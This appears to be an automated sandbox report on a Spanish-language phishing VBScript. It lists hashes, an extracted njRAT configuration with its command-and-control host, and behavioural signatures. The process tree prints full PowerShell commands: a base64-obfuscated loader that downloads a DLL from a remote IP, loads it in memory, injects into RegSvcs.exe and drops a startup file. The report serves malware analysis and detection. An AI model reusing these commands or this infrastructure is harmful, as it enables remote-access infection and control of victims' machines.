Analysis
-
max time kernel
146s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
11/08/2022, 14:55
Static task
static1
Behavioral task
behavioral1
Sample
Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs
Resource
win7-20220715-en
General
-
Target
Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs
-
Size
205KB
-
MD5
173a182f65910267fa0e8590dd0cfc0e
-
SHA1
3b8bf6b2f4ad725511fca0e0198b4499c75fe86c
-
SHA256
49bb9b1be17a3b590a8cb4245e1a3f07fb13648676ff7e0240f3030678c503d6
-
SHA512
44d5a9a9d2166253c2af4b8820f323d29a2cd7042a3408440bd86b8422d25a28006891ca9f690d756271e85d09965047c2eebcbd18b5af8a378ff0785924900d
Malware Config
Extracted
http://91.241.19.49/ARTS/dllf3txt
Extracted
njrat
0.7NC
NYAN CAT
wibnj.duckdns.org:57831
549d524552
-
reg_key
549d524552
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 4724 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\&%$5tBTDY()R0%$#HFJfb.vbs powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\&%$5tBTDY()R0%$#HFJfb.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4724 set thread context of 4416 4724 powershell.exe 88 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 956 powershell.exe 956 powershell.exe 4724 powershell.exe 4724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 956 powershell.exe Token: SeDebugPrivilege 4724 powershell.exe Token: SeDebugPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe Token: 33 4416 RegSvcs.exe Token: SeIncBasePriorityPrivilege 4416 RegSvcs.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4824 wrote to memory of 956 4824 WScript.exe 84 PID 4824 wrote to memory of 956 4824 WScript.exe 84 PID 956 wrote to memory of 4724 956 powershell.exe 86 PID 956 wrote to memory of 4724 956 powershell.exe 86 PID 4724 wrote to memory of 4416 4724 powershell.exe 88 PID 4724 wrote to memory of 4416 4724 powershell.exe 88 PID 4724 wrote to memory of 4416 4724 powershell.exe 88 PID 4724 wrote to memory of 4416 4724 powershell.exe 88 PID 4724 wrote to memory of 4416 4724 powershell.exe 88 PID 4724 wrote to memory of 4416 4724 powershell.exe 88 PID 4724 wrote to memory of 4416 4724 powershell.exe 88 PID 4724 wrote to memory of 4416 4724 powershell.exe 88
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBBAFIAVABTAC8AZABsAGwAZgAzAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH⌚⌚⌚ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAxAFgAWgAvAHcAZQBuAC8AdABzAG⌚⌚⌚AdAAvADkANAAuADkAMQAuADEANAAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACYAJQAkAD⌚⌚⌚AdABCAFQARABZACgAKQBSADAAJQAkACMAIgBIAEYASgBmAGIAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ARTS/dllf3txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.1XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , '&%$5tBTDY()R0%$#"HFJfb' ))"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4416
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3